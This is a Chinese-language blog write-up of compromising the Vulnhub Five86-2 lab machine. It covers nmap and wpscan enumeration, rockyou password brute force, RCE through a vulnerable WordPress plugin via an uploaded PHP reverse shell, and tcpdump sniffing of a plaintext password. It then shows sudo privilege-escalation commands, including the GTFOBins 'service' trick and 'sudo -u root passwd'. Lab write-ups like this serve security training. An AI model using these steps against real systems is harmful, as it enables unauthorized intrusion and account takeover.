首页 > 其他分享 >Vulnhub:Five86-2靶机

Vulnhub:Five86-2靶机

时间:2023-03-03 22:34:28浏览次数:54  
标签:Five86 sudo 用户 192.168 wpscan Vulnhub 靶机 root paul

kali:192.168.111.111

靶机:192.168.111.211

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.211

image

wpscan收集目标wordpress用户

wpscan --url http://five86-2/ -e u

image

wpscan爆破用户密码

wpscan --url http://five86-2/ -U user.txt -P /usr/share/wordlists/rockyou.txt

image

使用barney登录wordpress后台,发现插件Insert or Embed Articulate Content into WordPress Trial存在远程代码执行

searchsploit Insert or Embed Articulate

image

image

image

漏洞利用

创建一个zip压缩包里面包含一个html文件,和php反弹shell

image

image

image

image

上传后文件所在路径

image

之后访问php反弹shell

image

image

提权

使用之前wpscan爆破出的stephen用户的密码切换到stephen用户

image

使用linpease.sh收集信息,发现可以使用tcpdump

image

tcpdump抓取流量,获得paul用户密码:paul|esomepasswford

timeout 100 tcpdump -i br-eca3858d86bf

image

切换到paul用户查看sudo权限

image

提权方法:https://gtfobins.github.io/gtfobins/service/#sudo

image

sudo -u peter service ../../bin/sh

image

peter用户sudo权限

image

用命令passwd修改root用户密码

sudo -u root /usr/bin/passwd

image

切换到root用户

su root

image

获得flag

image

标签:Five86,sudo,用户,192.168,wpscan,Vulnhub,靶机,root,paul
From: https://www.cnblogs.com/ctostm/p/17177238.html

相关文章

  • Vulnhub之View2akill靶机测试过程(部分)
    View2akill识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/View2akill]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|......
  • vulnhub靶场之MATRIX-BREAKOUT: 2 MORPHEUS
    准备:攻击机:虚拟机kali、本机win10。靶机:Matrix-Breakout:2Morpheus,下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova,下载后直接......
  • 靶机练习6: BSS(Cute 1.0.2)
    靶机地址https://www.vulnhub.com/entry/bbs-cute-102,567/信息收集进行全端口扫描,确认目标开放端口和服务nmap-n-v-sS--max-retries=0-p-172.16.33.9对开放......
  • Hack the box靶机列表(类似OSCP lab的靶机)
     Linux的靶机列表Windows的靶机列表比OSCP更具挑战性的靶机列表,但值得练习2022年更新的靶机列表 5LamelegacyJeeves[Windows]Backdoor[Linux]  ......
  • OSCP练习靶机
    搞不到OSCP官方泄露的lab,只好搞一些有质量的、相似的靶机来练习首先感谢大哥的分享(34条消息)和oscp相似的靶机-hackthebox&vulnhub(OSCP-LIKEHACKTHEBOX&VULNHUB)......
  • [Vulnhub] MY FILE SERVER: 1
    下载地址0x00配置攻击机IP:192.168.10.5靶机IP:192.168.10.40x01攻击用Namp扫描靶机开放的端口┌──(root㉿azwhikaru)-[~]└─#nmap-A192.168.10.4......
  • [Vulnhub] DC: 1
    下载地址0x00配置攻击机IP:192.168.10.5靶机IP:192.168.10.60x01攻击用Namp扫描靶机开放的端口┌──(root㉿azwhikaru)-[~]└─#nmap-sC-sV-p-192.16......
  • 靶机练习5: Sar
    靶机地址https://www.vulnhub.com/entry/sar-1,425/信息收集阶段进行全端口扫描,枚举目标的端口和服务nmap-n-v-sS--max-retries=0-p-172.16.33.13nmap-sV-p......
  • 靶机练习4: SolidState
    信息收集阶段全端口扫描,查询目标靶机开放端口和服务sudonmap-p--n-v-sS--max-retries=0172.16.33.35进行服务版本扫描nmap-p22,25,80,110,119,4555-sV-A1......
  • [Vulnhub] DRIFTINGBLUES: 4
    下载地址0x00配置攻击机IP:192.168.10.5靶机IP:192.168.10.40x01攻击用Namp扫描靶机开放的端口┌──(root㉿azwhikaru)-[~]└─#nmap-sC-sV-p-192.16......